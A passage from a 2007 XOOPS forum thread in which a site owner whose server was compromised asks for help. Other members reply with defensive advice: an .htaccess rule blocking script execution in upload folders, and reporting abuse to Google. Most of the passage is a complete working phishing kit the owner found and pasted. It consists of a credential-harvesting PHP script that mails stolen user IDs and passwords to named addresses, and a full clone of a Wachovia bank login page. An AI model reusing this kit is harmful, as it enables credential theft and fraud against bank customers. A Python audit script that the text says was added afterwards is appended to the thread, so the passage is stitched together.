21
wtravel
Re: Open holes and hacked

Quote:
if i did it in the XOOPS path /www where i have xoops's files, it will be correct ?

That is not correct, it will cause your XOOPS script to stop working and it will make your php files readable (so also mainfile.php, which contains sensitive data).

xgarb says in his post to place the .htaccess file with that code in your uploads folder.

22
dizzymarkus
Re: Open holes and hacked

Ok here's the skinny on how they are gaining access or so I believe.

For some reason they can gain access and get this uploaded, which makes its own folder called "seite", once as "module" (instead of modules (I caught that one lol)) and once an html file in the uploads directory. (I have since adjusted permissions, changed account password, rechecked main_file.php and added the htaccess that was mentioned here.)


I had a weird file called modules.zip -- I downloaded and looked in it. It had two files --

1. LOGIN.PHP

<<<<<<<<<<<<<<<<<<<code>>>>>>>>>>>>>>>>>>>>>>>>
<?

$ip getenv("REMOTE_ADDR");
$message .= "------------------------------n";
$message .= "User ID: ".$_POST['userid']."n";
$message .= "Password: ".$_POST['password']."n";
$message .= "IP: ".$ip."n";
$message .= "-------Created By Palmers-------n";


$recipient "darkcrews@gmail.com,www.crew@gmail.com";
$subject "WaChoviA";
$headers "From: ";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version: 1.0n";
     if (
mail($recipient,$subject,$message,$headers))
       {
           
header("Location: http://www.wachovia.com");

       }
else
           {
         echo 
"ERROR! Please go back and try again.";
         }

?>


<<<<<<<<<<<<<<<<<<<<end code>>>>>>>>>>>>>>>>>>>>>>



and an htm file called SERVICE.HTM

<<<<<<<<<<<<<<<<<<<<<<<<<code>>>>>>>>>>>>>>>>>>>>>>>>>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<
html xmlns="http://www.w3.org/1999/xhtml">
<
head>
<
meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
meta http-equiv="Pragma" content="no-cache" />
<
meta http-equiv="Cache-Control" content="no-cache" />
<
meta http-equiv="Expires" content="Mon, 01 Jan 2001 13:00:00 GMT" />
<
title>Online Services Account Login</title>
    <
link href="https://onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />
    <
link href="https://onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
    <
style type="text/css">@import url("/ols/css/interference.css");</style>
    <
link href="https://onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />
    <
script type="text/javascript" language="JavaScript1.2" src="https://www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>

<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/utility.js"></script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/messaging.js"></script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/login.js"></script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/bidata.js"></script>
<
script type="text/javascript" language="JavaScript">
<!--
if (
top != self) {
    
top.location=self.location;
}
document.cookie='CookiesAreEnabled=yes; path=/; secure';
window.name="LoginPage";
var 
timeStamp = new Date().getTime();
//-->
</script>
</
head>
<
body id="default" class="twocol login" onunload="passReset();enableSubmits();">
<!-- 
Dual Login Form -->
<
form method="post" action="/auth/AuthService" name="dualForm" id="dualForm" onsubmit="return disableSubmits();">
    <
input type="hidden" name="action" value="presentLogin" />
    <
input type="hidden" name="credtype" value="DUAL" />
        <
input type="hidden" name="credtype" value="UID" />
</
form>
<
div id="limiter">
<
div id="header"><img src="https://onlineservices.wachovia.com/ols/images/logo.gif" alt="Wachovia Logo" width="240" height="52" id="logo" /><script type="text/javascript" language="JavaScript">setBrand();</script>
        <
img src="https://onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" width="246" height="21" id="subbrand" />
    </
div>
    <
div id="pusher">
        <
div id="content">
            <
div id="main">                
                <
h1>Online Services Login</h1>                
                <
div id="details">        
                <
p>Enter the appropriate login information below, and select your service.</p>                
                </
div>                    
                <
ul>
                <
li>Retirement Plan Participants: <a href="https://commercial.wachovia.com/Online/Financial/Business/Service?action=wrsLogin">Login</a></li>
                </
ul>                
                <
form method="post" action="login.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return disableSubmits();">
        <
input type="hidden" name="credtype" value="UID" />
                <
input type="hidden" value="uidLogin" name="action" />
                <
input type="hidden" value="" name="bi" />
                <
input type="hidden" value="" name="requestTimestamp" />
                <
table border="0" cellpadding="0" cellspacing="0" class="formtable">
                <
tr>
                    <
td class="colgutter"></td>
                    <
td class="label"><label for="userid">User ID</label>
                    <
td class="colgutter"></td>
                    <
td><input type="text" name="userid" id="userid" autocomplete="off" value="" tabindex="1"></td>
                </
tr>
                <
tr>
                    <
td colspan="3"></td>
                    <
td>
                        <
label for="rememberuid" class="nestinput"><input type="checkbox" name="rememberuid" id="rememberuid" tabindex="6" />Remember my User ID</label>&nbsp;&nbsp;&nbsp;
                        <
a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/remember_my_user_id.htm')" tabindex="7" >Learn More</a>
                    </
td>
                </
tr>
                <
tr>
                    <
td></td>
                    <
td class="label" nowrap="nowrap"><label for="password">Password</label></td>
                    <
td class="colgutter"></td>
                    <
td><input type="password" name="password" id="password" autocomplete="off" value="" tabindex="2" /></td>
                </
tr>
                <
tr><td></td><td></td><td></td><td><div class="format">Case Sensitive</div></td></tr>                
                <
tr>
                    <
td></td>
                    <
td class="label" nowrap="nowrap"><label for="service">Service Selection</label></td>
                    <
td class="colgutter"></td>
                    <
td>
                    <
select name="systemtarget"  width="160" onchange="getValue(this.form.name);" tabindex="3">
                        <
option value="gotoOSH">Choose a service...</option>
                        <
option value="gotoOSH">Online Services Home</option>
                        <
option value="gotoBanking">Online Banking</option>
                        <
option value="gotoBillPay">Online BillPay</option>
                        <
option value="gotoBrokerage">Online Brokerage</option>
                    </
select>
                    </
td>
                </
tr>                
                <
tr>
                    <
td colspan="4" class="center">
                    
                    <
input type="submit" value="Login" tabindex="4" class="button w80" id="submitButton" name="submitButton">
                    </
td>
                </
tr>
                </
table>
                </
form>
            </
div>
            <
div id="related" class="clear">
                <
div class="box">
                    <
h2><span>Customer Service</span></h2>
                    <
h3></h3>
                    <
ul>
                        <
li><a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/user_id_and_password_rules.htm')">User ID &ampPassword Help</a></li>
                        <
li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&amp;nextpage=USERIDLOOKUP&amp;credtype=UID">Forgot your User ID?</a></li>
                        <
li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&amp;nextpage=PWRESET&amp;returnurl=/auth/AuthService&amp;credtype=UID">Reset your Password</a></li>
                    </
ul>
                    
                    <
h3></h3>
                    <
ul class="small">
                        <
li>Customer Access Number: <a href="#" onclick="return submitForm('dualForm');">Login</a></li>
                    </
ul>                    
                </
div>
                <
div id="promo">
                <
script type="text/javascript" language="JavaScript">
                <!--
                
showMessage("slotA");
                
//-->
                
</script>
                </
div>
            </
div>
            <
hr class="textonly" />
            <
div id="navigation" class="blue">
                <
h2 class="ir">Navigation</h2>                
                <
div id="utilities" class="utility"></div>        
                <
div id="global" class="utility">
                    <
ul>                    
                        <
li class="first" id="officelocator"><a href="http://www.wachoviasec.com/home/locator.asp" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a></li>
                        <
li class="first" id="locations"><a href="http://wachovia.via.infonow.net/locator/?src=OLB" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Locations</a></li>
                    </
ul>                    
                </
div>
            </
div>
        </
div>
    </
div>
    <
hr class="textonly" />
    <
div id="footer">
        <
ul id="footerlinks" class="utility">
            <
li class="first"><a href="http://www.wachovia.com/popup/agreement/" target="popupwin" onclick="return popWinStnd(this.href);">Customer Agreement</a></li>
            <
li><a href="http://www.wachovia.com/popup/privacy/" target="popupwin" onclick="return popWinStnd(this.href);">Privacy</a></li>
            <
li><a href="http://www.wachovia.com/popup/security/" target="popupwin" onclick="return popWinStnd(this.href);">Security</a></li>
            <
li><a href="http://www.wachovia.com/popup/legal/" target="popupwin" onclick="return popWinStnd(this.href);">Legal</a></li>
        </
ul>
        <
div id="copyright">&copy2007 Wachovia CorporationAll rights reserved.</div>
    </
div>
    <
div id="footeralt">
        <
ul id="footerlinks" class="utility">
            <
li class="first"><a href="https://wachseconline.wachovia.com/LD_Privacy.html" target="popupwin" onclick="return popWinStnd(this.href);">Privacy</a></li>
            <
li><a href="https://wachseconline.wachovia.com/LD_Security.html" target="popupwin" onclick="return popWinStnd(this.href);">Security</a></li>
            <
li><a href="https://wachseconline.wachovia.com/LD_AccessOnlineAgree.html" target="popupwin" onclick="return popWinStnd(this.href);">Legal Disclosures</a></li>
            <
li><a href="https://wachseconline.wachovia.com/LD_Contact.html" target="popupwin" onclick="return popWinStnd(this.href);">Contact Us</a></li>
        </
ul>
        <
div id="copyright">&copy2007 Wachovia SecuritiesLLC (member NYSE/SIPC)</div>
        <
table id="notmay">
        <
caption>Securities and Insurance Products:<caption>
        <
tr>
            <
td>Not Insured by FDIC or any<br />Federal Government Agency</td>
            <
td>May Lose<br />Value</td>
            <
td>Not a Deposit of or Guaranteed by<br />a Bank or any Bank affiliate</td>
        </
tr>
        </
table>
        <
div id="disclosure">
        <
p>Wachovia Securities is the trade name used by two separateregistered broker-dealers and non-bank affiliates of 
        Wachovia Corporation providing certain retail securities brokerage services
Wachovia SecuritiesLLCmember 
        NYSE
/SIPC, and Wachovia Securities Financial NetworkLLCmember <span class="small">NASD</span>/SIPC.  Accounts 
        carried by First Clearing
LLCmember NYSE/SIPC.</p>
        <
p>Insurance products are offered through non-bank affiliates of Wachovia Corporation and are underwritten by unaffiliated 
        insurance companies
.</p>
        </
div>
    </
div>
</
div>
<
script language="JavaScript">
<!--
setSelection();
document.uidAuthForm.requestTimestamp.value timeStamp;
setUID('RMUID_1','rememberuid','userid','password');
setData();
//-->
</script>
<!-- 
BEGIN WEBSIDESTORY CODE v8.0.10 (11up) -->
<!-- 
COPYRIGHT 1997-2003 WEBSIDESTORYINCALL RIGHTS RESERVEDU.S.PATENT No6,393,479 B1Privacy notice athttp://websidestory.com/privacy -->
<script type="text/javascript" language="JavaScript" id="_hbc">
<!--
var 
_acct="DM530604BKCA;DM5306045EBV";    //account number(s)
var _pn="Wachovia+UID+Login+Page"//page name(s)
var _mlc="/login"//multi-level content category
var _seg=""// visitor segmentation
var _cmp=""// campaign id
var _gp="";  // campaign goal
var _cmpn="";// campaign id in query
var _gpn=""// campaign goal in query
var _fnl=""// funnels
var _pec=""// error codes
var _fv="";  // form validation function name
var _dcmp="";// dynamic campaign
var _dcmpn="";//dynamic campaign in query
var _hra=""// response attribute
var _hcn=""// conversion
var _hcv=""// conversion value
var _hlt=""// lead tracking
var _hla=""// lead attribute
var _hqsr="";// response attribute in referrer query
var _hqsp="";// response attribute in query
var _hc1=""// custom 1
var _hc2=""// custom 2
var _hc3=""// custom 3
var _hc4=""// custom 4
var _cid=""// customer id
var _cp="null"// campaign
var _cpd=""// campaign domain
var _pndef="title"//default page name
var _ctdef="full"//default content category
var _dlf="n"//download filter
var _elf="n"//exit link filter
var _epg="n"//event page identifier
var _gn="ehg-wachovia.hitbox.com",_mn="we56"//gateway & machine name
//-->
</script>
<
script type="text/javascript" language="JavaScript1.1" defer="defer" src="https://www.wachovia.com/metrics/stats.js"></script>
<!-- 
END WEBSIDESTORY CODE  -->
<!-- 
Start of DoubleClick Spotlight TagPlease do not remove-->
<!-- 
Activity Name for this tag is:Online Services Login -->
<!-- 
Web site URL where tag should be placedhttps://onlineservices.ite.wachovia.com/auth/AuthService?action=presentLogin&url=%2FNASApp%2FNavApp%2FTitanium%3faction=returnHome -->
<!-- This tag must be placed within the opening <bodytag, as close to the beginning of it as possible-->
<!-- 
Creation Date:07/07/03 -->
<
script language="JavaScript">
var 
axel Math.random()+"";
var 
axel 10000000000000;
document.write('<img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=''?" width="1" height="1" border="0">');
</
script>
<
noscript>
<
img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=1?" width="1" height="1" border="0">
</
noscript>
<!-- 
End of DoubleClick Spotlight TagPlease do not remove-->
</
body>
</
html>


<<<<<<<<<<<<<<<<<<<<<<<<<<<<<end code>>>>>>>>>>>>>>>>>>>>>>>


I would appreciate any help given in how to stop this -- apparently I have a three strike rule with my host and I will be asked to go to another server. :0(


Thank you,
Markus

23
dizzymarkus
Re: Open holes and hacked

BUMP.............................

Anyone please?


Thank you
Markus

24
skenow
Re: Open holes and hacked
  • 2007/6/14 1:39

  • skenow

  • Home away from home

  • Posts: 993

  • Since: 2004/11/17


Quote:

dizzymarkus wrote:
Ok heres the skinny on how they are gaining access or so I believe.



How they gain access is still the question. The rest of your post is what they do after they get access.

Where do the folders and files reside? In /uploads or the root?

Shared servers and anonymous ftp access are the biggest possibilities someone has for gaining access - both the responsibilities of your host to secure, imho.

25
vaughan
Re: Open holes and hacked
  • 2007/6/14 7:01

  • vaughan

  • Friend of XOOPS

  • Posts: 680

  • Since: 2005/11/26


btw, you should send that modules.zip & relevant info to googlemail abuse.

Report the email addresses used in the script ($recipient = "darkcrews@gmail.com, www.crew@gmail.com";), which are gmail addresses. Google will then look at the script and determine that they are using gmail's service illegally and close their accounts. They may also begin a criminal investigation if they think it's warranted, as they are in their rights to do so.

26
Peekay
Re: Open holes and hacked
  • 2007/6/14 8:45

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Quote:

xgarb wrote:

Stick this in your .htaccess file in any upload directory..

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI



If everyone agrees this works, can it be included in the downloads folder for future XOOPS releases? Or perhaps include a suggestion in the 'readme' to use this in all 777 folders.

Should be in the FAQ too.
A thread is for life. Not just for Christmas.

27
dizzymarkus
Re: Open holes and hacked

My bad on the gaining access wording -- lol I was thinking how the "" did they get in while I was typing it :0( SORRY


This has happened three times -- only once has a folder been in the uploads directory, the other two it was in the root. (I also added the htaccess in the meantime)

Thank you for the google abuse tip -- I will send it out today to them. :0)

Still am afraid to reopen the site as this is the third strike with my hosting. If it happens again they are gonna lock my account. I never had a problem with previous versions of XOOPS in the last 2 years until now. I even emailed that person and told them there is no bank info on a free site and nothing is sold -- please remove me from your phishing list. They actually had the balls to return my email with a note "THANKS FOR THE INFO" and that's it. Thanks for all the help you guys are giving.

Markus

28
Peekay
Re: Open holes and hacked
  • 2007/6/14 9:54

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Now that you know they are using a valid email address, you should (as vaughan suggested) complain to Google Mail. Although if Google do decide to take action against the account holder they would have to be quick. I would imagine that dynamic IP addresses make it impossible for Google to block future registrations and the hackers may set up a different g-mail account every week.

If your web root is compromised, it may actually be the host's fault, not yours. An exploit utilising PhpBB was the source of widespread hacks on shared servers a couple of years ago. You didn't need to be running PhpBB on your site to get hacked.

@moderator
Can someone trim the wide code in one of the above posts so this thread is more readable.
A thread is for life. Not just for Christmas.

29
debianus
Re: Open holes and hacked
  • 2007/6/14 10:07

  • debianus

  • Not too shy to talk

  • Posts: 179

  • Since: 2006/12/17


Quote:

Peekay wrote:

If everyone agrees this works, can it be included in the downloads folder for future XOOPS releases? Or perhaps include a suggestion in the 'readme' to use this in all 777 folders.

Should be in the FAQ too.


I agree; it would be a pity for this wonderful tip to be lost in the forums.
I have posted it in the Spanish support forum; other local support forums could do it too.

30
Dave_L
Re: Open holes and hacked
  • 2007/6/14 10:52

  • Dave_L

  • XOOPS is my life!

  • Posts: 2277

  • Since: 2003/11/7


Quote:

Stick this in your .htaccess file in any upload directory..

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI


What exactly does this do? I've read the Apache documentation, but don't fully understand it.
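
On the two directives quoted above: `AddHandler cgi-script` assigns the listed extensions to Apache's CGI handler, and `Options -ExecCGI` then forbids CGI execution in that directory, so a request for a dropped `.php` or `.htm` file is refused rather than run or served (assuming the host's `AllowOverride` permits both directives). The following is an added example, not part of the original thread or of XOOPS: a Python audit that lists world-writable directories and checks whether each carries that `.htaccess`; the function names and the demo tree are constructed for illustration.

```python
import os
import stat
import tempfile

# Extensions from the AddHandler line quoted in the thread.
HANDLED_EXTS = {".php", ".pl", ".py", ".jsp", ".asp", ".htm", ".shtml", ".sh", ".cgi"}


def blocked_extensions(htaccess_path):
    """Extensions mapped to cgi-script, but only if ExecCGI is also switched off."""
    exts, exec_off = set(), False
    try:
        with open(htaccess_path, encoding="utf-8", errors="replace") as fh:
            for raw in fh:
                parts = raw.split()
                if not parts or parts[0].startswith("#"):
                    continue
                directive, args = parts[0].lower(), [a.lower() for a in parts[1:]]
                if directive == "addhandler" and args[:1] == ["cgi-script"]:
                    # Apache accepts extensions with or without the leading dot.
                    exts.update("." + a.lstrip(".") for a in args[1:])
                elif directive == "options" and "-execcgi" in args:
                    exec_off = True
    except OSError:
        return set()  # no readable .htaccess: nothing is blocked
    return exts if exec_off else set()


def audit_webroot(root):
    """Report each world-writable directory: is it covered, what scripts sit in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if not os.stat(dirpath).st_mode & stat.S_IWOTH:
            continue
        # Simplification: only the directory's own .htaccess is read, not its parents'.
        covered = blocked_extensions(os.path.join(dirpath, ".htaccess"))
        scripts = sorted(f for f in files
                         if os.path.splitext(f)[1].lower() in HANDLED_EXTS)
        findings.append({
            "dir": os.path.relpath(dirpath, root),
            "protected": HANDLED_EXTS <= covered,
            "servable_scripts": [s for s in scripts
                                 if os.path.splitext(s)[1].lower() not in covered],
        })
    return sorted(findings, key=lambda f: f["dir"])


def build_demo_tree():
    """Constructed sample webroot: one bare 777 folder, one with the .htaccess."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    for name, mode in (("uploads", 0o777), ("cache", 0o777), ("modules", 0o755)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)
    for name in ("LOGIN.PHP", "SERVICE.HTM", "modules.zip"):  # file names from the thread
        open(os.path.join(root, "uploads", name), "w").close()
    with open(os.path.join(root, "cache", ".htaccess"), "w") as fh:
        fh.write("AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi\n"
                 "Options -ExecCGI\n")
    open(os.path.join(root, "cache", "dropped.php"), "w").close()
    return root


if __name__ == "__main__":
    for finding in audit_webroot(build_demo_tree()):
        print(finding)
```

Point `audit_webroot()` at the real web root to see which 777 folders still lack the file; any entry under `servable_scripts` is a file the web server would still hand out or execute from a writable directory.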
